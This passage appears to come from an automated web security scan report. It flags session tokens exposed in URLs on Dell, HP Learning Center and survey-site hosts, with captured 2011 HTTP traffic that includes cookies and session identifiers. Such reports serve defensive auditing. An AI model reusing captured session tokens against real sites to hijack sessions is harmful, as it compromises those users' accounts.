<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nz-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in New Zealand</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ng-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Nigeria</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-py-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Paraguay</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-rs-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Serbia</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-pt-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Portugal</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-sk-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovakia</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-si-120&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovenia</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-za-120&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Africa</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-kr-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Korea</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-es-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Spain</a>
...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ch-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Switzerland</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gb-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the UK</a>
...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-uy-60&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Uruguay</a>
...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-us-unlimited&amp;campaign-token=XEAADWKU&amp;cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in the USA</a>
...[SNIP]...

8.4. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153155747-78365&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=1&mbox=enus_ng&mboxId=0&mboxTime=1315135150946&profile.r=us&profile.c=us&profile.l=en&profile.s=bsd&profile.cs=04&profile.pn=&profile.pt=&profile.catid=&profile.catpath=&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/JavaScript
Content-Length: 8923
Date: Sun, 04 Sep 2011 16:19:14 GMT
Server: Test & Target

var mboxCurrent = mboxFactories.get('default').get('enus_ng',0);mboxCurrent.setOffer(new mboxOfferAjax('<!-- Offer Id: 68329 --><!--\nID 155 - US BSD - browse ANAV layout\nID 406 - US BSD Browse Fran
...[SNIP]...

8.5. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/dellinc/mbox/standard?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153150925-582363&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=2&mbox=enus_create&mboxId=0&mboxTime=1315135150965&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40&mboxXDomainCheck=true HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315153150925-582363.19; Domain=dellinc.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 16:19:15 GMT; Path=/m2/dellinc
Content-Type: text/javascript
Content-Length: 166
Date: Sun, 04 Sep 2011 16:19:14 GMT
Server: Test & Target

mboxFactories.get('default').get('enus_create',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315153150925-582363.19");

8.6. http://ecustomeropinions.com/survey/survey.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://ecustomeropinions.com
Path:   /survey/survey.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /survey/survey.php?sid=603736412&pagenum=1&ecos_live_sessionkey=ecos_sesh_753333&doneskipping=1&vault=_ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ecustomeropinions.com
Cookie: server=www18; PHPSESSID=mgd0vgc60sr4gk9t1ql92arlu3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: server=www18; path=/
Pragma: no-cache
P3P: CP="NOI DSP COR ADM DEV PSA PSD OUR IND COM NAV"
Content-Length: 4839
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...

8.7. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /campus/p/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:19 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:25 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 56488
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/courses/overview/p/courseId/34389/Adobe_Photoshop_CS4_introduction.htm?courseSessionId=306003&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/43988/Adobe_Photoshop_CS4_introduction_64x64.jpg?v=1281722923000" alt="Adobe Photoshop CS4: introduction" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/courses/overview/p/courseId/34389/Adobe_Photoshop_CS4_introduction.htm?courseSessionId=306003&campusId=10640" class="bold">Adobe Photoshop CS4: introduction</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/articles/viewArticle/p/courseId/39570/Adobe_Photoshop_CS4_layer_basics_quick_lesson_.htm?courseSessionId=306047&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/49584/Adobe_Photoshop_CS4_layer_basics_64x64.jpg?v=1281733557000" alt="Adobe Photoshop CS4: layer basics (quick lesson)" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/articles/viewArticle/p/courseId/39570/Adobe_Photoshop_CS4_layer_basics_quick_lesson_.htm?courseSessionId=306047&campusId=10640" class="bold">Adobe Photoshop CS4: layer basics (quick lesson)</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/courses/overview/p/courseId/7/Building_your_first_web_page.htm?courseSessionId=319918&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/46149/Building_your_first_web_page_64x64.jpg?v=1281723189000" alt="Building your first web page" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/courses/overview/p/courseId/7/Building_your_first_web_page.htm?courseSessionId=319918&campusId=10640" class="bold">Building your first web page</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/articles/viewArticle/p/courseId/39808/Changing_hue_and_sat.htm?courseSessionId=320072&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/49719/Change_hue_saturation_Photoshop_CS4_64x64.jpg?v=1281735208000" alt="Changing hue and saturation in Adobe.. Photoshop.. CS4 (quick lesson)" border
...[SNIP]...
<td align=left valign="top">
<a href="/articles/viewArticle/p/courseId/39808/Changing_hue_and_sat.htm?courseSessionId=320072&campusId=10640" class="bold">Changing hue and saturation in Adobe.. Photoshop.. CS4 (quick lesson)</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/articles/viewArticle/p/courseId/39807/Exploring_color_mode.htm?courseSessionId=320073&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/49717/Explore_color_modes_Photoshop_CS4_64x64.jpg?v=1281735207000" alt="Exploring color modes in Adobe.. Photoshop.. CS4 (quick lesson)" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/articles/viewArticle/p/courseId/39807/Exploring_color_mode.htm?courseSessionId=320073&campusId=10640" class="bold">Exploring color modes in Adobe.. Photoshop.. CS4 (quick lesson)</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/courses/overview/p/courseId/23629/Intermediate_website_design.htm?courseSessionId=306011&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/40527/Intermediate_website_design_64x64.jpg?v=1281721718000" alt="Intermediate website design" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/courses/overview/p/courseId/23629/Intermediate_website_design.htm?courseSessionId=306011&campusId=10640" class="bold">Intermediate website design</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/courses/overview/p/courseId/12976/Jump_start_your_crea.htm?courseSessionId=306013&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/33169/jump-start_your_creativity_64x64.jpg?v=1281719082000" alt="Jump-start your creativity: exploring Leonardo da Vinci's notebooks" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/courses/overview/p/courseId/12976/Jump_start_your_crea.htm?courseSessionId=306013&campusId=10640" class="bold">Jump-start your creativity: exploring Leonardo da Vinci's notebooks</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/articles/viewArticle/p/courseId/38756/Photoshop_101_image_.htm?courseSessionId=305979&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/48894/Photoshop_101_image_size_and_resolution_basics_64x64.jpg?v=1281728528000" alt="Photoshop 101: image size and resolution basics (quick lesson)" bo
...[SNIP]...
<td align=left valign="top">
<a href="/articles/viewArticle/p/courseId/38756/Photoshop_101_image_.htm?courseSessionId=305979&campusId=10640" class="bold">Photoshop 101: image size and resolution basics (quick lesson)</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/courses/overview/p/courseId/39129/Print_marketing_mate.htm?courseSessionId=306031&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/49070/Print_marketing_materials_in-house_on_a_wide-format_printer_64x64.jpg?v=1281731127000" alt="Print marketing materials in-house on a wide-format p
...[SNIP]...
<td align=left valign="top">
<a href="/courses/overview/p/courseId/39129/Print_marketing_mate.htm?courseSessionId=306031&campusId=10640" class="bold">Print marketing materials in-house on a wide-format printer</a>
...[SNIP]...

8.8. http://h30187.www3.hp.com/howto_QL_courses.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /howto_QL_courses.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /howto_QL_courses.jsp?contentType=How-to+in+2&mcid=explore-create HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:22 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:29 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 125944
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/19629/Color_your_business_.htm?courseSessionId=173976&campusId=11262" title="Learn how development of the right color scheme for your marketing collateral can take your business to the next level.">Color your business: develop a marketing color scheme</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/18330/Mastering_email_keep_your_inbox_clutter_free.htm?courseSessionId=175486&campusId=11262" title="Learn how to organize email files and folder structure and use your program's search functionality to achieve better inbox management.">Mastering email: keep your inbox clutter-free</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14760/Microsoft_Excel_2007.htm?courseSessionId=173985&campusId=11262" title="This animated demonstration introduces you to the new Microsoft Excel 2007 interface, which is very different from earlier versions.">Microsoft.. Excel 2007: take a tour of the interface and learn basic skills</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14168/Microsoft_Windows_Vi.htm?courseSessionId=173997&campusId=11262" title="This animated demonstration shows you how to find files using basic Search in Windows Vista.">Microsoft.. Windows Vista: find files using basic Search</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14763/Microsoft_Word_2007_take_a_tour_of_the_Ribbon.htm?courseSessionId=174000&campusId=11262" title="This animated demonstration shows you how to use the Ribbon, the new, tabbed navigation system in Microsoft Word 2007.">Microsoft.. Word 2007: take a tour of the Ribbon</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14167/Microsoft_Excel_2007_create_a_PivotTable.htm?courseSessionId=173981&campusId=11263" title="This step-by-step demonstration shows you how to summarize a large amount of data to glean some meaning from it using PivotTables in Microsoft Excel 2007.">Microsoft.. Excel 2007: create a PivotTable</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14171/Microsoft_Excel_2007_filter_data.htm?courseSessionId=173982&campusId=11263" title="This animated demonstration shows you how to filter data in Microsoft Excel 2007. ">Microsoft.. Excel 2007: filter data</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14170/Microsoft_Excel_2007.htm?courseSessionId=173983&campusId=11263" title="This animated demonstration shows you how to link and unlink information between Microsoft Excel workbooks.">Microsoft.. Excel 2007: link and unlink content between two workbooks</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/35909/Microsoft_Excel_2007.htm?courseSessionId=173977&campusId=11263" title="Formatting can make a chart come to life with colors, patterns and effects. This demonstration teaches you to manually format parts of a chart.">Microsoft.. Excel 2007: manually format parts of a chart</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14169/Microsoft_Excel_2007.htm?courseSessionId=173984&campusId=11263" title="This animated demonstration shows you how to record a simple macro in Excel and edit it in VBA.">Microsoft.. Excel 2007: record a simple macro and edit it in VBA</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14760/Microsoft_Excel_2007.htm?courseSessionId=173985&campusId=11263" title="This animated demonstration introduces you to the new Microsoft Excel 2007 interface, which is very different from earlier versions.">Microsoft.. Excel 2007: take a tour of the interface and learn basic skills</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/40441/Microsoft_Excel_2010_creating_PivotTables.htm?courseSessionId=368865&campusId=11263" title="This step-by-step demonstration shows you how to summarize a large amount of data to glean some meaning from it using PivotTables in Microsoft Excel 2010.">Microsoft.. Excel 2010: creating PivotTables</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/40440/Microsoft_Excel_2010.htm?courseSessionId=368864&campusId=11263" title="This animated demonstration shows you how to link and unlink information between Microsoft Excel 2010 workbooks.">Microsoft.. Excel 2010: linking and unlinking Excel workbooks</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/40439/Microsoft_Excel_2010.htm?courseSessionId=368863&campusId=11263" title="This animated demonstration introduces you to the new Microsoft Excel 2010 interface and teaches you some basic skills.">Microsoft.. Excel 2010: take a tour of the interface and learn basic skills</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/26569/Microsoft_PowerPoint.htm?courseSessionId=173979&campusId=11263" title="You can create master slides in PowerPoint to add or change design elements and formatting in presentations. Learn how in this demonstration.">Microsoft.. PowerPoint 2007: create a new slide master</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/26589/Microsoft_PowerPoint.htm?courseSessionId=173986&campusId=11263" title="In this demonstration you'll learn how to change options and customize the interface to find the toolbars and functions you need most.">Microsoft.. PowerPoint 2007: customize the PowerPoint interface</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/40443/Microsoft_PowerPoint.htm?courseSessionId=368867&campusId=11263" title="You can create master slides in PowerPoint 2010 to add or change design elements and formatting in presentations. Learn how in this demonstration.">Microsoft.. PowerPoint 2010: create a new slide master</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/39829/Microsoft_Windows_7_.htm?courseSessionId=324159&campusId=11263" title="In this demonstration, you will learn how to speed up your network and internet connections using Microsoft.. Windows.. 7 Professional.
">
Microsoft.. Windows.. 7: speed up network and internet connections</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14762/Microsoft_Word_2007_.htm?courseSessionId=173980&campusId=11263" title="Microsoft Word 2007 offers new special features. Follow along with this demonstration to learn how to use a few of them.">Microsoft.. Word 2007: take a tour of special features</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14763/Microsoft_Word_2007_take_a_tour_of_the_Ribbon.htm?courseSessionId=174000&campusId=11263" title="This animated demonstration shows you how to use the Ribbon, the new, tabbed navigation system in Microsoft Word 2007.">Microsoft.. Word 2007: take a tour of the Ribbon</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14764/Microsoft_Word_2007_use_the_Track_Changes_feature.htm?courseSessionId=174001&campusId=11263" title="This step-by-step demonstration shows you how to track revisions to documents in Microsoft Word 2007.">Microsoft.. Word 2007: use the Track Changes feature</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/40442/Microsoft_Word_2010_take_a_tour_of_the_Ribbon.htm?courseSessionId=368866&campusId=11263" title="This animated demonstration shows you how to use the Ribbon in Microsoft Word 2010.">Microsoft.. Word 2010: take a tour of the Ribbon</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14172/Microsoft_Windows_Vi.htm?courseSessionId=173987&campusId=11264" title="This animated demonstration shows you how to back up the registry in Windows Vista.">Microsoft.. Windows Vista advanced customization: back up the registry</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14173/Microsoft_Windows_Vi.htm?courseSessionId=173988&campusId=11264" title="This animated demonstration shows you how to increase bandwidth for network and internet connections in Windows Vista.">Microsoft.. Windows Vista advanced customization: increase bandwidth for network and internet connections</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14168/Microsoft_Windows_Vi.htm?courseSessionId=173997&campusId=11264" title="This animated demonstration shows you how to find files using basic Search in Windows Vista.">Microsoft.. Windows Vista: find files using basic Search</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/35913/Microsoft_Windows_Vi.htm?courseSessionId=173978&campusId=11264" title="The registry is the database of system settings for Windows Vista. In this demonstration you'll see how to find info in the registry.">Microsoft.. Windows Vista: find information in the registry</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14091/Microsoft_Windows_Vista_Sidebar_adding_gadgets.htm?courseSessionId=173999&campusId=11264" title="Make your desktop work for you by adding gadgets to the Windows Vista Sidebar.">Microsoft.. Windows Vista Sidebar: adding gadgets</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/14761/Microsoft_Windows_Vista_use_Disk_Cleanup.htm?courseSessionId=173998&campusId=11264" title="You can use Disk Cleanup Wizard to save hard disk space by deleting files you might not need. Learn how in this step-by-step demonstration.">Microsoft.. Windows Vista: use Disk Cleanup</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/19629/Color_your_business_.htm?courseSessionId=173976&campusId=11260" title="Learn how development of the right color scheme for your marketing collateral can take your business to the next level.">Color your business: develop a marketing color scheme</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/18330/Mastering_email_keep_your_inbox_clutter_free.htm?courseSessionId=175486&campusId=11260" title="Learn how to organize email files and folder structure and use your program's search functionality to achieve better inbox management.">Mastering email: keep your inbox clutter-free</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/25989/Microsoft_OneNote_creating_and_using_notebooks.htm?courseSessionId=175487&campusId=11260" title="Find out how to use notebooks in Microsoft OneNote 2007 to organize your notes by topic, project, class or organization.">Microsoft.. OneNote: creating and using notebooks</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/25990/Microsoft_OneNote_getting_started.htm?courseSessionId=175488&campusId=11260" title="Learn about the basics of Microsoft OneNote 2007 and how it helps you organize and keep track of notes and other pieces of information. No papers or sticky notes required!">Microsoft.. OneNote: getting started</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/18329/Use_color_coding_to_prioritize_your_email.htm?courseSessionId=175489&campusId=11260" title="Learn how to transform an unorganized sea of email messages in your inbox into an actionable, prioritized list so you know what to read first.">Use color-coding to prioritize your email</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/18331/Use_Google_Desktop_t.htm?courseSessionId=175490&campusId=11260" title="Do you have tons of files on your hard disk or in email archives, and you can't find what you need? Let Google Desktop be your retriever.">Use Google Desktop to find and retrieve what you need</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/16608/HP_Backup_and_Recovery_Manager_restore_files.htm?courseSessionId=175481&campusId=10163" title="All HP business desktop and notebook computers have HP Backup and Recovery Manager. Learn how to use this application to restore files in this demonstration.">HP Backup and Recovery Manager: restore files</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/16609/HP_Backup_and_Recovery_Manager_schedule_backups.htm?courseSessionId=175482&campusId=10163" title="All HP business desktop and notebook computers have HP Backup and Recovery Manager. This demonstration shows you how to use this application to back up files.">HP Backup and Recovery Manager: schedule backups</a>
...[SNIP]...
<td align="left" valign="top" width="540">


